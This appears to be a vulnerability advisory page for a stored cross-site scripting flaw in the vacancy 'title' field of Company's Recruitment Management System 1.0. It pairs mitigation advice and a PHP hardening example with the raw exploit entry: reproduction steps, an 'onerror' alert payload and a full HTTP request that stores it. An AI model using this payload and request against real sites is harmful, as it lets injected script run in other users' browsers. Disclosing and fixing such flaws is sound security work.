Vendor: Company's Recruitment Management System 1.0.
By: Aniket Deshmane
CVSS: 8.8 (HIGH)
Stored Cross-Site Scripting (XSS)
CWE: 79
Product Name: Company's Recruitment Management System 1.0.
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:sourcecodester:company's_recruitment_management_system_1.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 10, XAMPP
2021

Company’s Recruitment Management System 1.0. – ‘title’ Stored Cross-Site Scripting (XSS)

A stored cross-site scripting vulnerability exists in Company's Recruitment Management System 1.0: the 'title' field of the 'vacancies' tab accepts and stores arbitrary input, including JavaScript, and the stored value is later rendered to every user who visits the application, where the injected script executes in that user's browser.

Mitigation:

Input validation should be used to prevent malicious code from being stored in the application. Additionally, the application should be configured to use a Content Security Policy (CSP) to prevent malicious code from being executed.
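As an added example (not code from the advisory or from the vendor's application), the following PHP shows the mitigations above applied to the 'title' value: an allow-list check at save time, HTML entity encoding at render time, and a Content Security Policy header. The function names, the markup and the error message are assumptions; the application's own save_vacancy handler is not shown on this page.

```php
<?php
// Added example, not the advisory's or the vendor's code. Function names,
// markup and the error message are assumptions; the real
// Actions.php?a=save_vacancy handler is not shown on the advisory page.

// Validation at save time: an allow-list for a vacancy title. Characters such
// as < > " are simply not accepted, so the payload is rejected before storage.
function is_valid_title(string $value): bool
{
    return preg_match('/^[\p{L}\p{N} .,\-\/()&\']{1,100}$/u', $value) === 1;
}

// Encoding at render time: the control that removes the vulnerability. Every
// HTML-special character becomes an entity, so the browser displays the text
// instead of parsing a new tag. ENT_QUOTES also encodes single quotes, which
// matters when the value is placed inside an attribute.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Defence in depth: a CSP that disallows inline script and inline event
// handlers (onerror=, onclick=), so a missed encoding site still does not run.
function send_csp(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");
}

// Constructed sample input: the string quoted in the advisory.
$title = '"><img src=x onerror=alert(1)>';

// Headers must be sent before any output.
send_csp();

if (!is_valid_title($title)) {
    // Hypothetical response for the save handler; the original returns JSON
    // to an XMLHttpRequest, so a JSON error object is used here.
    echo json_encode(['status' => 'failed', 'msg' => 'Invalid vacancy title']), "\n";
}

// Vulnerable pattern the advisory describes: the stored value inside markup.
//   echo '<input type="text" name="title" value="' . $title . '">';
// Hardened rendering, in attribute context and in text context:
echo '<input type="text" name="title" value="' . html_escape($title) . '">', "\n";
echo '<h3>' . html_escape($title) . '</h3>', "\n";
```

Output encoding is the fix; validation only narrows what reaches storage and a CSP only limits what a missed encoding site can do. A policy this strict also blocks any inline scripts the application itself relies on, so deploy it first as Content-Security-Policy-Report-Only and tighten it once the violation reports are clean.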

Exploit-DB raw data:

# Exploit Title: Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)
# Date: 17-10-2021
# Exploit Author: Aniket Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10,XAMPP

Steps to Reproduce:
1) Navigate to http://127.0.0.1/employment_application and log in with a staff account.
2) Navigate to the vacancies tab.
3) Click on Add new.
4) Add the payload

"><img src=x onerror=alert(1)>

in the Vacancy Title field.

5) Click on Save and you are done. It's gonna be triggered when anyone visits the application.

Request:

POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------15502044322641666722659366422
Content-Length: 931
Origin: http://127.0.0.1
DNT: 1
Connection: close
Cookie: PHPSESSID=e00mbu2u5cojpsh5jkaj9pjlfc
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Cache-Control: no-transform

-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="id"


-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="title"

"><img src=x onerror=alert(1)>
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="designation_id"

1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="slots"

1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="status"

1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="description"


-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------15502044322641666722659366422--